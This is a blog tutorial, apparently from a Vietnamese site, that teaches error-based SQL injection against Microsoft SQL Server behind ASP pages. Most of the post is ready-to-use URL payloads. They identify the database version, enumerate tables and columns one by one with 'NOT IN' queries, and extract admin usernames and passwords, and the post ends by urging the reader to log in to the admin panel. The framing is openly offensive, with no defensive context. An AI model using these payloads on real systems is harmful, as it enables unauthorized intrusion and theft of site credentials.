MSSQL INJECTION


This article is related to mssql Injection.
There are few ways to determine the vulnerability for this
injectionyou can put quote (') at the end of url and it will show
error like

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the ID integer '5' '.
index.asp, line 30

www.target.com/index.asp?id=1 and 1=1-- Load Perfect

www.target.com/index.asp?id=1 and 1=2-- Mssql Error

if 1=1 does make it load perfectly we may need to put quote (string) '+and+1=1--+-
okay in our case we have mssql error page

FIND DATABASE, VERSION

mssql injection queries are not really difficult :) if you have good knowledge in mysql injection, its not that tough for you ..
SO I will not be covering on mysql injection basics :)
watch my previous tutorials
How we can find our database?

+and+1=convert(int,@@version)--

IN URL:

www.target.com/index.asp?id=1'+and+1=convert(int,@@version)--

and like it we can find our database by using this query

+and+1=convert(int,db_name())--

IN URL:

www.target.com/index.asp?id=1'+and+1=convert(int,db_name())--
and same for user name
'+and+1=convert(int,user_name())--

Extracting Table names from database

We Will be using NOT IN method to find table names
we can only fetch table names one by one. that is really pain in ...... :p
so lets fetch first table name from database , our query will be like

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-

real time example

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-

lets say our first table is : table1
lets now find 2nd table name, then our query will be like

+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1')))--

Real time example:

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1')))--

and for third table we use


www.target.com/index.asp?id=1+and+1=convert
(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in
('table1','table2')))--

Fiding Column names

okay so now we have our table names but we dont know how to find column names in those tables?
lets say we want to find columns of table1
we will be using this query

+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'))--

In URL it will be like

www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'))--

Note: table1 is the name of table

Now Lets see the error message

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
index.asp, line 30

So if we look carefully we will see column name in this error that is "username"

Now.. we have our first column name, how to find next column?
We will be using this query

+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+
where+table_name='table1'+and+column_name+not+in+('username')))--

in URL

www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+
table_name='table1'+and+column_name+not+in+('username')))--

okay lets say this time error show the column_name is 'Password'
So this is how things work in NOT IN method.

okay, Now we have tables and their column names but we dont know how to extract entries from these tables and columns

lets say we have column name username in table table1. To get its entries we will use query like:


+and+1=convert(int,(select+top+1+username+from+table1))--
Error will be like

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin@site' to data type int.

index.asp, line 30

admin@site is our required username

and so for password we will use

+and+1=convert(int,(select+top+1+password+from+table1))--

In URL:

www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+username+from+table1))--

Error will be like

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'adminPass123' to data type int.

index.asp, line 30

SO now we have admin username and admin Password. Just find the admin panel and bangg

Thanks for reading this tutorial

regard's

Hướng dẫn bình luận

Mọi người để lại bình luận góp ý, nhận xét về những bài viết mà mình chia sẽ văn minh lịch sự hay kích động, Không spam, không chèn link quảng cáo, bán hàng, Không sử dụng từ ngữ thô tục, xúc phạm, kích động, Link chỉ được phép khi thực sự liên quan đến nội dung bài viết, Không mạo danh người khác hoặc sử dụng email giả, Bình luận vi phạm sẽ bị xóa không cần thông báo trước.
Mọi người lưu ý răng, nếu muốn chia sẽ code ở bình luần thì cần mã hóa code trước khi bỏ vào khung nhé. :)
⑴ Chèn ℂ𝕤𝕤 theo mẫu : [pre css] ℂ𝕤𝕤 [/pre]
⑵ Chèn ℍ𝕥𝕞𝕝 theo mẫu : [pre html] ℍ𝕥𝕞𝕝 [/pre]
⑶ Chèn 𝕁𝕒𝕧𝕒𝕤𝕔𝕣𝕚𝕡𝕥 theo mẫu : [pre js] 𝕁𝕒𝕧𝕒𝕤𝕔𝕣𝕚𝕡𝕥 [/pre]
🖼️ Chèn 𝕀𝕞𝕒𝕘𝕖 theo mẫu : [img] 𝕃𝕚𝕟𝕜 𝕀𝕞𝕒𝕘𝕖 [/img]
🎞️ Chèn Video 𝕐𝕠𝕦𝕥𝕦𝕓𝕖 theo mẫu : [youtube] 𝕃𝕚𝕟𝕜 𝕪𝕠𝕦𝕥𝕦𝕓𝕖 [/youtube]

Đăng nhận xét

@Bloggers Community

iconVN Coding iconTruongDevs iconAnh Trai Nắng icon.Thinhem Blog iconChiều Cuối Năm iconTrick Pro Software iconDân tộc KING iconFood VN iconanh Hí blog iconTrực Blog's iconHung EVN Blog

@Catalogics

CSS (31) Google (7)

@Total Pageviews